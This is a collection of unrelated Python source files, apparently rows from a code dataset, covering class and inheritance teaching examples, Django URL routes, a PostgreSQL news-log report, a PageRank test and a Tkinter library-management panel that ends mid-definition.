        """Show both operands and the computed sum."""
        print("First number = " + str(self.first))
        print("Second number = " + str(self.second))
        print("Addition of two numbers = " + str(self.answer))
    def calculate(self):
        """Compute and store the sum of the operands."""
        self.answer = self.first + self.second
# Invoke the parameterized constructor, compute, then report.
obj = Addition(1000, 2000)
obj.calculate()
obj.display()
class sub():
    """Holds a single number passed to the constructor."""
    first = 0  # class-level default
    def __init__(self, f):
        # keep the supplied number on the instance
        self.first = f
    def displayresult(self):
        """Print the stored number."""
        print('number is', self.first)
# Build one instance and show its number.
obj1 = sub(100)
obj1.displayresult()
#2.. multilevel inheritance: defaultcon -> sub -> exsub
class defaultcon:
    """Base class with a default constructor that only prints."""
    def __init__(self):
        print('defaultconstructor')
        #self.geek = "defaultconstructor"
    def print_defaultcon(self):
        """Print a marker showing the inherited method was reached."""
        print('defaultconstructor1')
class sub(defaultcon):
    """First derived level: stores one number."""
    first = 0
    def __init__(self, f):
        # note: deliberately does NOT chain to defaultcon.__init__
        self.first = f
    def displayresult(self):
        print('number is', self.first)
class exsub(sub):
    """Second derived level: reuses sub's constructor, adds a second field."""
    second = 0
    def __init__(self, y):
        super().__init__(y)  # equivalent to sub.__init__(self, y)
        self.second = y
    def dis(self):
        print('number2 is', self.second)
# Exercise methods from every level of the hierarchy.
obj = exsub(100)
obj.displayresult()
obj.print_defaultcon()
obj.dis()
#3.. access modifiers demo: public, protected, private (and default)
class Geek:
    """All members public: accessible directly from outside the class."""
    def __init__(self, name, age):
        # public data members
        self.geekName = name
        self.geekAge = age
    def displayAge(self):
        """Public member function."""
        print("Age: ", self.geekAge)
# Public members can be read and called from module level.
obj = Geek("usha", 20)
print("Name: ", obj.geekName)
obj.displayAge()
# protected access modifiers (single leading underscore: convention only)
class Student:
    """Base class whose members are 'protected' by naming convention."""
    # protected data members (class-level defaults)
    _name = None
    _roll = None
    _branch = None
    def __init__(self, name, roll, branch):
        # store the protected instance state
        self._name = name
        self._roll = roll
        self._branch = branch
    def _displayRollAndBranch(self):
        """Protected member function."""
        print("Roll: ", self._roll)
        print("Branch: ", self._branch)
# derived class: may freely use the base's protected members
class Geek(Student):
    def __init__(self, name, roll, branch):
        super().__init__(name, roll, branch)  # same as Student.__init__(self, ...)
    def displayDetails(self):
        """Public wrapper around the protected helpers."""
        print("Name: ", self._name)
        self._displayRollAndBranch()
obj = Geek("usha", 256, "cse")
obj.displayDetails()
# private access modifiers (double leading underscore: name mangling)
class Student:
    """Members are private: mangled to _Student__name etc."""
    # private data members (class-level defaults)
    __name = None
    __roll = None
    __branch = None
    def __init__(self, name, roll, branch):
        # store the private instance state
        self.__name = name
        self.__roll = roll
        self.__branch = branch
    def __displayRollAndBranch(self):
        """Private member function; only reachable from inside the class."""
        print("Name: ", self.__name)
        print("Roll: ", self.__roll)
        print("Branch: ", self.__branch)
    def displayDetails(self):
        """Public entry point delegating to the private printer."""
        self.__displayRollAndBranch()
obj = Student("usharani", 256, "IT")
obj.displayDetails()
#4. write constructors and display values as both string and int
class Addition:
    """Stores two numbers; display() shows them formatted two ways."""
    # class-level defaults
    first = 0
    second = 0
    answer = 0
    def __init__(self, f, s):
        # parameterized constructor: keep both operands
        self.first, self.second = f, s
    def display(self):
        """Print each operand via str() concatenation and via int()."""
        print("First number = " + str(self.first))
        print("Second number = " + str(self.second))
        print("First number = ",int(self.first))
        print("Second number = ",int(self.second))
# Invoke the parameterized constructor and display the result.
obj = Addition(1000, 2000)
obj.display()
#5. call the constructor multiple times, rebinding the same name each time
class new:
    """Prints a message every time an instance is constructed."""
    def __init__(self):
        print('constructor is created')
# Four constructions: the message prints once per instance, and `a` ends up
# bound to the last one.
a=new()
a=new()
a=new()
a=new()
18,306 | 0862c4fc4e074aca898cfec74220e6a9030a6db0 | from functools import reduce
# Delimiter used between the function name and each key/value fragment.
SEPARATOR = '^#$'
def code(function_name, kwargs_dict):
    """Serialize a function name and a dict of string kwargs into one string.

    Layout: name SEP key1 SEP value1 SEP key2 SEP value2 ...
    BUG FIX: the original reduce() concatenated each key directly onto its
    value (no separator between them) and raised TypeError on an empty dict.
    """
    parts = [function_name]
    for key, value in kwargs_dict.items():
        parts.extend((key, value))
    return SEPARATOR.join(parts)
def recode(coded_str):
    """Inverse of code(): return (function_name, kwargs_dict).

    BUG FIX: the original indexed splited_list[2*i] (the function name) as
    the first key, dropped every value's true position, and used float
    division in range() (a TypeError on Python 3); indices are now offset
    by one and the division is integer.
    """
    splited_list = coded_str.split(SEPARATOR)
    function_name = splited_list[0]
    kwargs_dict = {}
    # fragments after the name come in (key, value) pairs
    for i in range((len(splited_list) - 1) // 2):
        kwargs_dict[splited_list[2*i + 1]] = splited_list[2*i + 2]
    return function_name, kwargs_dict
18,307 | f4b5767cf63723ee77fcb8f2e063806c5fa40b40 | ##adicionei - Serve para importar arquivos em outro diretório
import sys
# Make the Insertion directory importable so monitor/InsertionSort resolve.
sys.path.append('/home/gmarson/Git/AnaliseDeAlgoritmos/Trabalho_Final/Codigos/Insertion')
from monitor import *
from InsertionSort import *
import argparse
# Usage: this_script.py N  (e.g. `testeBubble.py 10`), where N is the number
# of elements in the test vector.
parser = argparse.ArgumentParser()
parser.add_argument("n", type=int, help="número de elementos no vetor de teste")
args = parser.parse_args()
# criavet builds a random vector of n elements (provided by one of the star
# imports above -- TODO confirm which module defines it), which is then
# sorted in place by insertionSort.
v = criavet(args.n)
insertionSort(v)
18,308 | 393a1e8c670458f70d53b90f08810e43cedb1ac0 | from decompy.EquivalencyClasses.Tokenizers.Tokens.Token import Token
class PositiveIntegerToken(Token):
    """Token that matches (and remembers) a non-negative base-10 integer.

    Comparison with an int or a digits-only string assigns the token's value
    on first use; subsequent comparisons check against the stored value.
    """
    def __init__(self):
        Token.__init__(self)
        # None means "not yet assigned"; 0 is a legitimate assigned value.
        self._value = None
    def reset(self):
        """Forget any previously matched value."""
        self._value = None
    def value(self):
        """Return the matched integer; raise if nothing was matched yet.

        BUG FIX: the original used `if not self._value`, which wrongly
        raised for an assigned value of 0.
        """
        if self._value is None:
            raise AttributeError("Cannot resolve an unassigned numeric token")
        return self._value
    def __eq__(self, other):
        # Already assigned: plain equality against the stored value.
        # BUG FIX: truthiness check replaced with an explicit None test so a
        # stored 0 is honoured.
        if self._value is not None:
            return other == self._value
        if isinstance(other, int):
            self._value = other
            return True
        if isinstance(other, str):
            # BUG FIX: an empty string used to fall through the digit loop
            # and crash on int(''); reject it explicitly.  (The original's
            # duplicate, unreachable `elif isinstance(other, int)` branch
            # was removed.)
            if not other:
                return False
            for char in other:
                if char not in "0123456789":
                    return False
            self._value = int(other)
            return True
        return False
    def __str__(self):
        return "<Unknown Integer: %s>" % hex(id(self))
if __name__ == "__main__":
    # Ad-hoc demo of lazy token binding.
    a = PositiveIntegerToken()
    b = PositiveIntegerToken()
    def result():
        # Reads the module-global `token`, which is (re)bound by the for
        # loop below before each call.
        try:
            print("Token value:", Token.resolve(token))
        except AttributeError as e:
            print("Token value: unassigned")
    # NOTE(review): the literal 5 in this list is a plain int, not a token;
    # comparing it with == below will not bind anything -- confirm intended.
    for token in [a, a, 5, b]:
        result()
        print("Compare token to int 4", token == 4)
        result()
        print("Compare token to int 5", token == 5)
|
18,309 | 1998882d5d85d6b2a99fe1762fb0768a4009fc08 | """Ask URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from MalyshevAsk import views as ask_views
# URL routes for the Ask app. Order matters: the regexes are not anchored
# with '$' (each uses an optional trailing slash '/?'), and the final
# catch-all '^/?' routes anything unmatched back to the index view.
urlpatterns = [
    url(r'^vote/?', ask_views.vote),
    url(r'^correct/?', ask_views.correct),
    url(r'^logout/?', ask_views.logout, name = "logout"),
    url(r'^admin/?', admin.site.urls),
    url(r'^index/?', ask_views.index, name = "index"),
    url(r'^login/?', ask_views.login, name = "login"),
    url(r'^signup/?', ask_views.signup, name = "signup"),
    url(r'^personal_page/?', ask_views.personal_page, name = "personal_page"),
    url(r'^ask/?', ask_views.ask, name = "ask"),
    # Captures the question id as the `qid` view argument.
    url(r'^question/(?P<qid>\d+)', ask_views.question, name = "question"),
    url(r'^searchByTag/?', ask_views.searchByTag, name = "tag"),
    url(r'^getPostParameters/?.*', ask_views.getPostParameters),
    url(r'^hot/?', ask_views.hot),
    url(r'^/?', ask_views.index, name = "index")
]
18,310 | b4e816bf8d1446d17ed5d217288454bc3fb5ccb0 | from django.contrib import admin
from .models import Registro
from .models import Cita
# Register your models here.
admin.site.register(Cita)
admin.site.register(Registro)
|
18,311 | 2da493803f796804310cebdad9d32bf4df2c251a | #!/usr/bin/env python3
import psycopg2
# Connect to news database
DBNAME = "news"
db = psycopg2.connect(database=DBNAME)
c = db.cursor()
# 3 most popular articles of all time (title, number of views)
top_article_query = '''
select title, views
from articles join adjusted_logs on (articles.slug = adjusted_logs.FixPath)
group by title, views
order by views desc
limit 3
'''
c.execute(top_article_query)
article_results = c.fetchall()
# For loop to have results print in plain text
print(' ')
print('Here are the top three articles')
print('--------------------------------')
print(' ')
for title, views in article_results:
print('"{}" - {} views.'.format(title, views))
# Who are the most popular article authors of all
# time (author name, number of views)
print(' ')
print('Here are the top three authors')
print('--------------------------------')
print(' ')
top_author_query = '''
select authors.name, sum(adjusted_logs.views) as TotalViews
from articles
join adjusted_logs on (articles.slug = adjusted_logs.FixPath)
join authors on (authors.id = articles.author)
group by authors.name
order by TotalViews desc
limit 3
'''
c.execute(top_author_query)
author_results = c.fetchall()
for author, views in author_results:
print('{} - {} views.'.format(author, views))
# On which days did more than 1% of requests lead to errors (date, % of errors)
error_query = '''
select FailRate.FailDate,
ROUND(((FailRate.NumFail::decimal / TAccess.TCount::decimal) * 100), 2)
from (
select time::date as Date, count(status) as TCount
from log
group by Date
) as TAccess join (
select time::date as FailDate, status, count(status) as NumFail
from log
where status = '404 NOT FOUND'
group by FailDate, status
) as FailRate on TAccess.Date = FailRate.FailDate
where ((FailRate.NumFail::decimal / TAccess.TCount::decimal) * 100) > 1
group by FailRate.FailDate, FailRate.NumFail, TAccess.TCount
'''
c.execute(error_query)
error_results = c.fetchall()
print(' ')
print('Here are the days where there were more that 1% errors')
print('-----------------------------------------------------')
print(' ')
for date, percentage in error_results:
print('{} - {}% errors '.format(date, percentage))
db.close()
|
18,312 | 7943351a490f6d3a9033328187cf2c9ed5b0a177 | from test.basetestcase import TestCase
from pagerank import get_page_rank_scores
class PageRankTestCase(TestCase):
    """Regression tests pinning exact PageRank scores for two tiny graphs."""

    def test_get_page_rank_scores(self):
        """Check scores for an acyclic chain and for a graph with a cycle.

        Edges are (source, target) pairs. The expected values are exact
        floats produced by the implementation under test.
        NOTE(review): node 3 is absent from the first expected dict even
        though it appears as an edge target -- presumably sink nodes get no
        score in the acyclic case; confirm against get_page_rank_scores.
        """
        result = get_page_rank_scores([(1, 2), (2, 4), (4, 3)])
        self.assertEqual(result, {
            1: 0.05000000000000001,
            2: 0.092500000000000027,
            4: 0.12862500000000002,
        })
        result = get_page_rank_scores(
            [(1, 2), (2, 4), (4, 3), (3, 1), (3, 2)],
        )
        self.assertEqual(result, {
            1: 0.15667918572028511,
            2: 0.28985649358252741,
            3: 0.2791899914185817,
            4: 0.2838780195451483,
        })
|
18,313 | c2e98701b26525d315de2925cc55358095d6b264 | from models.models import (user_chooses_copy_or_move,
get_source_and_target_directories,
action_all_files_or_specified,
perform_move_or_copy)
# asks the user whether wants to copy or move the files
copy_or_move_choice = user_chooses_copy_or_move()
# returns tuple of directories: (src, tgt)
src_and_tgt_dirs = get_source_and_target_directories(copy_or_move=copy_or_move_choice)
# asks whether to action on all files in the dir or just specific files
all_or_list = action_all_files_or_specified()
if all_or_list == 'l':
# TODO: Implement checks on the txt file, kind of the point of the whole thing.
# TODO: Clean this up, it looks dreadful
print(f"\nDue to time constraints, it was not coded in to ensure the list_of_files.txt file exists or is populated")
print("If it's not present, since you selected 'l' it will not throw an error to you but it will just do nothing")
print(f"If it's not there then create list_of_files.txt where app.py exists"
f" and populate it with target filenames on each row, such as")
for n in range(3):
print(f"target_filename_{n}.extension")
print("\n!Make sure you have included the file extensions!")
list_of_files = []
with open('list_of_files.txt', 'r', encoding='utf-8-sig') as txtfile:
for line in txtfile.readlines():
list_of_files.append(line.replace('\n', ''))
print(f"Files in text file are: {list_of_files}")
perform_move_or_copy(move_or_copy=copy_or_move_choice,
src=src_and_tgt_dirs[0],
tgt=src_and_tgt_dirs[1],
list_of_files=list_of_files)
elif all_or_list == 'a':
# re-formatting from c or m for use in f string literals later on
if copy_or_move_choice == 'c':
print_choice = 'copy'
elif copy_or_move_choice == 'm':
print_choice = 'move'
print(f"{print_choice}ing all files from source to target directory")
perform_move_or_copy(move_or_copy=copy_or_move_choice,
src=src_and_tgt_dirs[0],
tgt=src_and_tgt_dirs[1],
list_of_files=None)
|
18,314 | 662e617866ab16c19b5998e566de1d32b782156e | from tkinter import *
from tkinter import ttk
from tkinter import messagebox
from PIL import Image, ImageTk
import pymysql
from tkinter.filedialog import askopenfile
import csv
class librarian_page:
    """Tkinter window implementing the librarian's control panel.

    Builds the books table, library statistics and action buttons, and
    talks directly to a local MySQL database (via pymysql) named lms_2.
    NOTE(review): DB credentials are hard-coded in several methods below --
    consider centralising them.
    """

    def __init__(self, root):
        """Build the full-screen dashboard inside the given Tk root."""
        self.root = root
        self.root.title("Library Management System - Librarian's Panel")
        screen_width = self.root.winfo_screenwidth()
        screen_height = self.root.winfo_screenheight()
        #self.root.geometry('800x500+0+0')
        self.root.geometry(f'{screen_width}x{screen_height}+0+0')
        self.root.state('zoomed')
        self.root.config(bg='#EBF5FB')
        # Background image stretched to (almost) the whole screen.
        self.img= (Image.open("images\lms.png"))
        img_x, img_y = screen_width, screen_height - 50
        #img_x, img_y = 600, 400
        self.resized_image= self.img.resize((img_x, img_y), Image.ANTIALIAS)
        self.new_image= ImageTk.PhotoImage(self.resized_image)
        self.img_label = Label(self.root, image=self.new_image).place(x=0, y=0, relwidth=1, relheight=1)
        frame1 = Frame(self.root, bg='#EBF5FB')
        frame1.place(x=40, y=40, width=img_x-60, height=img_y-80)
        title = Label(self.root, text='LIBRARIAN CONTROL PANEL', font=('Goudy old style', 20, 'bold',), bg='lightgray', fg='#088da5').place(x=450, y=20)
        ############################################################################################
        ############ BOOKS PANEL ###################################################################
        ############################################################################################
        frame2 = Frame(frame1, bg='lightgray')
        frame2.place(x=60, y=50, width=800, height=380)
        user_title = Label(frame1, text='BOOKS PANEL', font=('Goudy old style', 15, 'bold',),
                           bg='blue', fg='white').place(x=70, y=40)
        # Action buttons under the books table; several are placeholders
        # with no command bound yet.
        button1 = Button(frame2, text='Add a Book', font=('Goudy old style', 13, 'bold'),
                         bg='white', fg='#088da5', command=self.add_book).place(x=10, y=340)
        button2 = Button(frame2, text='Edit a Book', font=('Goudy old style', 13, 'bold'),
                         bg='white', fg='#088da5').place(x=120, y=340)
        button3 = Button(frame2, text='Delete a Book', font=('Goudy old style', 13, 'bold'),
                         bg='white', fg='#088da5', command=self.delete_user_table).place(x=230, y=340)
        button4 = Button(frame2, text='Advance Search', font=('Goudy old style', 13, 'bold'),
                         bg='white', fg='#088da5').place(x=350, y=340)
        button5 = Button(frame2, text='Import Books', font=('Goudy old style', 13, 'bold'),
                         bg='white', fg='#088da5', command=lambda:self.import_books()).place(x=480, y=340)
        button6 = Button(frame2, text='Export Books', font=('Goudy old style', 13, 'bold'),
                         bg='white', fg='#088da5').place(x=600, y=340)
        # 'R' = refresh the table from the database.
        button7 = Button(frame2, text='R', font=('Goudy old style', 13, 'bold'),
                         bg='white', fg='#088da5', command=self.fetch_user_table).place(x=720, y=340)
        frame2_sub = Frame(frame2, bd=4, relief=RIDGE, bg='white')
        frame2_sub.place(x=10, y=20, width=770, height=270)
        # Column ids must line up with the `books` table column order.
        user_columns = ['SN', 'BOOK TITLE', 'BOOK CODE', 'TOTAL QTY', 'AVAILABLE QTY', 'DESCRIPTION',
                        'AUTHOR', 'PUBLISHER', 'PRICE', 'CATEGORY', 'SUB_CATEGORY', 'CLASS', 'STREAM']
        scroll_x = Scrollbar(frame2_sub, orient=HORIZONTAL)
        scroll_y = Scrollbar(frame2_sub, orient=VERTICAL)
        self.user_table = ttk.Treeview(frame2_sub, columns=user_columns, xscrollcommand=scroll_x.set, yscrollcommand=scroll_y.set)
        scroll_x.pack(side=BOTTOM, fill=X)
        scroll_y.pack(side=RIGHT, fill=Y)
        scroll_x.config(command=self.user_table.xview)
        scroll_y.config(command=self.user_table.yview)
        self.user_table.heading('SN', text='SL NO')
        self.user_table.heading('BOOK TITLE', text='TITLE OF THE BOOK')
        self.user_table.heading('BOOK CODE', text='BOOK ID/CODE')
        self.user_table.heading('TOTAL QTY', text='TOTAL QTY')
        self.user_table.heading('AVAILABLE QTY', text='AVAILABLE QTY')
        self.user_table.heading('DESCRIPTION', text='DESCRIPTION')
        self.user_table.heading('AUTHOR', text='AUTHOR')
        self.user_table.heading('PUBLISHER', text='PUBLISHER')
        self.user_table.heading('PRICE', text='PRICE')
        self.user_table.heading('CATEGORY', text='CATEGORY')
        self.user_table.heading('SUB_CATEGORY', text='SUB CATEGORY')
        self.user_table.heading('CLASS', text='CLASS')
        self.user_table.heading('STREAM', text='STREAM')
        self.user_table['show'] = 'headings'
        self.user_table.column('SN', width=50)
        self.user_table.column('BOOK TITLE', width=150)
        self.user_table.column('BOOK CODE', width=100)
        self.user_table.column('TOTAL QTY', width=80)
        self.user_table.column('AVAILABLE QTY', width=80)
        self.user_table.column('DESCRIPTION', width=100)
        self.user_table.column('AUTHOR', width=150)
        self.user_table.column('PUBLISHER', width=100)
        self.user_table.column('PRICE', width=100)
        self.user_table.column('CATEGORY', width=100)
        self.user_table.column('SUB_CATEGORY', width=100)
        self.user_table.column('CLASS', width=100)
        self.user_table.column('STREAM', width=100)
        self.user_table.pack(fill=BOTH, expand=1)
        # Initial population of the table from the database.
        self.fetch_user_table()
        frame2_sub2 = Frame(frame2, bg='#EBF5FB')
        frame2_sub2.place(x=10, y=290, width=770, height=40)
        # Search bar (search buttons have no command bound yet).
        frame2_sub2_title = Label(frame2_sub2 , text='Enter Book ID/CODE :', font=('Goudy old style', 13),
                                  bg='#EBF5FB', fg='#088da5').place(x=5, y=5)
        frame2_sub2_entry = Entry(frame2_sub2 , text='', font=('Goudy old style', 13),
                                  bg='white', width=12).place(x=175, y=5)
        frame2_sub2_button = Button(frame2_sub2, text='Search', font=('Goudy old style', 12, 'bold'),
                                    bg='#EBF5FB', fg='#088da5', width=8, height=1 ).place(x=290, y=1)
        frame2_sub2_title2 = Label(frame2_sub2 , text='Enter Book Title :', font=('Goudy old style', 13),
                                   bg='#EBF5FB', fg='#088da5').place(x=380, y=5)
        frame2_sub2_entry2 = Entry(frame2_sub2 , text='', font=('Goudy old style', 13),
                                   bg='white', width=18).place(x=505, y=5)
        frame2_sub2_button2 = Button(frame2_sub2, text='Search', font=('Goudy old style', 12, 'bold'),
                                     bg='#EBF5FB', fg='#088da5', width=8, height=1 ).place(x=675, y=1)
        ###########################################################################################################
        ###################### LIBRARY STATISTICS #################################################################
        ###########################################################################################################
        # Computes self.total_no_of_books / total_books_issued / total_unique_books.
        self.no_of_books()
        frame4 = Frame(frame1, bg='lightgray')
        frame4.place(x=880, y=50, width=390, height=500)
        frame4_sub = Frame(frame4, bd=4, relief=RIDGE, bg='white')
        frame4_sub.place(x=10, y=20, width=360, height=470)
        view_title = Label(frame1, text='LIBRARY STATISTICS', font=('Goudy old style', 15, 'bold',),
                           bg='blue', fg='white').place(x=890, y=40)
        total_books = Label(frame4_sub, text='Total Nos of Books', font=('Goudy old style', 15, 'bold',),
                            bg='#EBF5FB', fg='#088da5').place(x=100, y=20)
        tbc = Label(frame4_sub, text="00"+str(self.total_no_of_books), font=('Goudy old style', 15, 'bold',),
                    bg='white', fg='blue').place(x=140, y=60)
        issued_books = Label(frame4_sub, text='Nos of Books Issued', font=('Goudy old style', 15, 'bold',),
                             bg='#EBF5FB', fg='#088da5').place(x=100, y=100)
        ibc = Label(frame4_sub, text="00"+str(self.total_books_issued), font=('Goudy old style', 15, 'bold',),
                    bg='white', fg='green').place(x=140, y=140)
        overdue_books = Label(frame4_sub, text='Overdue Books to Return', font=('Goudy old style', 15, 'bold',),
                              bg='#EBF5FB', fg='#088da5').place(x=80, y=180)
        # NOTE(review): overdue count is a hard-coded placeholder ('0085').
        obc = Label(frame4_sub, text='0085', font=('Goudy old style', 15, 'bold',),
                    bg='white', fg='red').place(x=150, y=220)
        ubn = Label(frame4_sub, text='Total Unique Books', font=('Goudy old style', 15, 'bold',),
                    bg='#EBF5FB', fg='#088da5').place(x=100, y=260)
        ubn2 = Label(frame4_sub, text="00"+str(self.total_unique_books), font=('Goudy old style', 15, 'bold',),
                     bg='white', fg='red').place(x=150, y=300)
        ###########################################################################################################
        ###################### BOOK ISSUE and SUB-PANELS###########################################################
        ###########################################################################################################
        # Three columns of action buttons; none have commands bound yet.
        frame5 = Frame(frame1, bg='lightgray')
        frame5.place(x=60, y=450, width=200, height=160)
        button1_f5 = Button(frame5, text='Issue Book', font=('Goudy old style', 13, 'bold'),
                            bg='white', fg='#088da5', width=12).place(x=20, y=10)
        button2_f5 = Button(frame5, text='Retreive Book', font=('Goudy old style', 13, 'bold'),
                            bg='white', fg='#088da5', width=12).place(x=20, y=60)
        button3_f5 = Button(frame5, text='Overdue Books', font=('Goudy old style', 13, 'bold'),
                            bg='white', fg='#088da5', width=12).place(x=20, y=110)
        frame6 = Frame(frame1, bg='lightgray')
        frame6.place(x=300, y=450, width=200, height=160)
        button1_f6 = Button(frame6, text='Book Categories', font=('Goudy old style', 13, 'bold'),
                            bg='white', fg='#088da5', width=12).place(x=20, y=10)
        button2_f6 = Button(frame6, text='Authors', font=('Goudy old style', 13, 'bold'),
                            bg='white', fg='#088da5', width=12).place(x=20, y=60)
        button3_f6 = Button(frame6, text='Publishers', font=('Goudy old style', 13, 'bold'),
                            bg='white', fg='#088da5', width=12).place(x=20, y=110)
        frame7 = Frame(frame1, bg='lightgray')
        frame7.place(x=540, y=450, width=200, height=160)
        button1_f7 = Button(frame7, text='Notifications', font=('Goudy old style', 13, 'bold'),
                            bg='white', fg='#088da5', width=12).place(x=20, y=10)
        button2_f7 = Button(frame7, text='Fines', font=('Goudy old style', 13, 'bold'),
                            bg='white', fg='#088da5', width=12).place(x=20, y=60)
        button3_f7 = Button(frame7, text='Students', font=('Goudy old style', 13, 'bold'),
                            bg='white', fg='#088da5', width=12).place(x=20, y=110)

    ############################################################################################################
    ######################################## FUNCTIONS ###################################################
    ############################################################################################################
    def add_book(self):
        """Open the 'Add Book' dialog (Toplevel) with the data-entry form.

        NOTE(review): several Entry/Combobox widgets are bound to the same
        attribute names (self.text_password, self.text_email,
        self.user_type_q), so earlier references are overwritten -- only the
        last widget of each name is reachable when saving; confirm intended.
        """
        self.t = Toplevel(self.root)
        self.t.title('Libray Management System')
        self.t.geometry('780x600+200+30')
        self.t.config(bg='lightgray')
        ab_frame1 = Frame(self.t, bg='#EBF5FB')
        ab_frame1.place(x=20, y=20, width=360, height=520)
        title = Label(self.t, text='ADD BOOK', font=('Goudy old style', 16, 'bold'), bg='white', fg='#088da5').place(x=140, y=4)
        save_button = Button(self.t, text='Save', width=10, command=self.save_button, font=('Goudy old style', 13, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=520, y=550)
        cancel_button = Button(self.t, text='Cancel', width=10, command=self.self_close, font=('Goudy old style', 13, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=640, y=550)
        title = Label(ab_frame1, text='Title of the Book', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=20, y=25)
        self.text_first_name = Entry(ab_frame1, font=('times new roman', 13), bg='white', width=35, borderwidth=2)
        self.text_first_name.place(x=20, y=55)
        title = Label(ab_frame1, text='Book Code/ID', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=20, y=85)
        self.text_last_name = Entry(ab_frame1, font=('times new roman', 13), bg='white', width=35, borderwidth=2)
        self.text_last_name.place(x=20, y=115)
        title = Label(ab_frame1, text='Description', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=20, y=145)
        self.text_password = Entry(ab_frame1, font=('times new roman', 13), bg='white', width=35, borderwidth=2)
        self.text_password.place(x=20, y=175)
        title = Label(ab_frame1, text='Author of the Book', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=20, y=205)
        self.text_password = Entry(ab_frame1, font=('times new roman', 13), bg='white', width=35, borderwidth=2)
        self.text_password.place(x=20, y=235)
        title = Label(ab_frame1, text='Publisher Name', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=20, y=265)
        self.text_contact = Entry(ab_frame1, font=('times new roman', 13), bg='white', width=35, borderwidth=2)
        self.text_contact.place(x=20, y=295)
        title = Label(ab_frame1, text='Price', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=20, y=325)
        self.text_email = Entry(ab_frame1, font=('times new roman', 13), bg='white', width=15, borderwidth=2)
        self.text_email.place(x=20, y=355)
        title = Label(ab_frame1, text='Quantity', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=200, y=325)
        self.text_email = Entry(ab_frame1, font=('times new roman', 13), bg='white', width=15, borderwidth=2)
        self.text_email.place(x=200, y=355)
        user_type = Label(ab_frame1, text='Category of the Book', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=20, y=385)
        self.user_type_q = ttk.Combobox(ab_frame1, font=('Goudy old style', 15), state='readonly')
        self.user_type_q['value'] = ("Select", 'Arts', 'Science', 'Commerce', 'Vocational')
        self.user_type_q.place(x=20, y=415)
        self.user_type_q.current(0)
        user_type = Label(ab_frame1, text='Class', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=20, y=445)
        self.user_type_q = ttk.Combobox(ab_frame1, font=('Goudy old style', 15), state='readonly', width=12)
        self.user_type_q['value'] = ("Select", '+2', '+3', 'P.G.', 'BCA', 'MCA')
        self.user_type_q.place(x=20, y=475)
        self.user_type_q.current(0)
        user_type = Label(ab_frame1, text='Stream', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=190, y=445)
        self.user_type_q = ttk.Combobox(ab_frame1, font=('Goudy old style', 15), state='readonly', width=12)
        self.user_type_q['value'] = ("Select", 'Arts', 'Science', 'Commerce', 'Vocational')
        self.user_type_q.place(x=190, y=475)
        self.user_type_q.current(0)
        # Right-hand side: book cover preview and file picker.
        ab_frame2 = Frame(self.t, bg='#EBF5FB')
        ab_frame2.place(x=400, y=20, width=360, height=520)
        title = Label(ab_frame2, text='*PICTURE OF THE BOOK*', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=70, y=25)
        button1 = Button(ab_frame2, text='<<', width=3, font=('Goudy old style', 13, 'bold'),bd=0, bg='#EBF5FB', fg='#088da5').place(x=10, y=200)
        button2 = Button(ab_frame2, text='>>', width=3, font=('Goudy old style', 13, 'bold'),bd=0, bg='#EBF5FB', fg='#088da5').place(x=310, y=200)
        self.frame2_sub = Frame(ab_frame2, bd=3, relief=RIDGE, bg='#EBF5FB')
        self.frame2_sub.place(x=45, y=50, width=265, height=370)
        ab_btn = Button(ab_frame2, text ='Browse', width=8, command = lambda:self.open_file()).place(x=260, y=440)
        btn_title = Label(ab_frame2, text='File:', font=('Goudy old style', 13, 'bold'), bg='#EBF5FB',
                          fg='#088da5').place(x=40, y=440)
        self.ab_btn_entry = Entry(ab_frame2, font=('times new roman', 13), bg='white', width=20, borderwidth=2)
        self.ab_btn_entry.place(x=80, y=440)

    def self_close(self):
        """Close the 'Add Book' dialog."""
        self.t.destroy()

    def open_file(self):
        """Pick a cover image, preview it scaled to 220px wide, and record its path."""
        book_img_file = askopenfile(mode ='r', filetypes =[('Image Files', ['*.jpg','*.png', '*.gif',])])
        if book_img_file is not None:
            print(book_img_file.name)
            self.ab_btn_entry.delete(0, END)
            self.ab_btn_entry.insert(0, book_img_file.name)
            self.book_img= (Image.open(book_img_file.name))
            book_img_width, book_img_height = self.book_img.size
            # Scale so width is 220, preserving the aspect ratio.
            x = book_img_width/220
            y = book_img_height/x
            img_x, img_y = 220, int(y)
            self.resized_book_image= self.book_img.resize((img_x, img_y), Image.ANTIALIAS)
            self.new_book_image= ImageTk.PhotoImage(self.resized_book_image)
            self.book_img_label = Label(self.frame2_sub, image=self.new_book_image).place(x=0, y=0, relwidth=1, relheight=1)
            messagebox.showinfo("Success", "Image has been successfully imported", parent=self.t)
        else:
            messagebox.showerror("Error", "No file has been selected", parent=self.t)

    def save_button(self):
        """Placeholder save handler -- only shows a message box for now."""
        messagebox.showerror("Hello", "You clicked save button", parent=self.root)

    def import_books(self):
        """Open a preview window for a CSV of books and load it for import.

        The CSV's header row must match ib_user_columns exactly; rows are
        kept in self.rows and committed later by import_to_db().
        NOTE(review): the error message "This file can be Imported" appears
        to be missing the word "not" -- confirm.
        """
        ib_user_columns = ['SN', 'BOOK TITLE', 'BOOK CODE', 'TOTAL QTY', 'AVAILABLE QTY', 'DESCRIPTION',
